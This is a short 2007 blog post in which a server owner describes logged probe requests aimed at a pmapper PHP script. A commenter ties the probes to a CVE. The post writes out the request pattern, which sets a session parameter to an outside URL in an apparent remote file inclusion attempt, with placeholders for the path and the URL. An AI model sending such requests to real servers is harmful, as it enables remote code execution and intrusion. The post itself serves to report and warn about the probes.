Search This Blog

06 December 2007

Vulnerable PHP application?

I seem to be getting a lot of requests on my webserver of the form: "GET /<directory-path>/pmapper-3.2-beta3/incphp/globals.php?__SESSION[PM_INCPHP]=<some-url>?" where replace the <directory-path> and the <some-url> with a path on your server and some random website respectively. It appears to be a probe to test for some vulnerability but I don't have the full request logged, only the request up to the question mark on the GET request so the payload isn't logged. The changing URLs are probably to throw people off the scent.

I must confess, I had no idea what this "pmapperr" application was before I observed these hits and nor do I have PHP installed on my webserver but I figure if I mention it on this blog, an audience who may be able to investigate can do something.

Oh well, I have done my part.

1 comment:

Sheeri K. Cabral said...

Antony,

The security vulnerability that folks are trying to exploit on your site is explained here:

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-6191

hope that helps you and others!

-Sheeri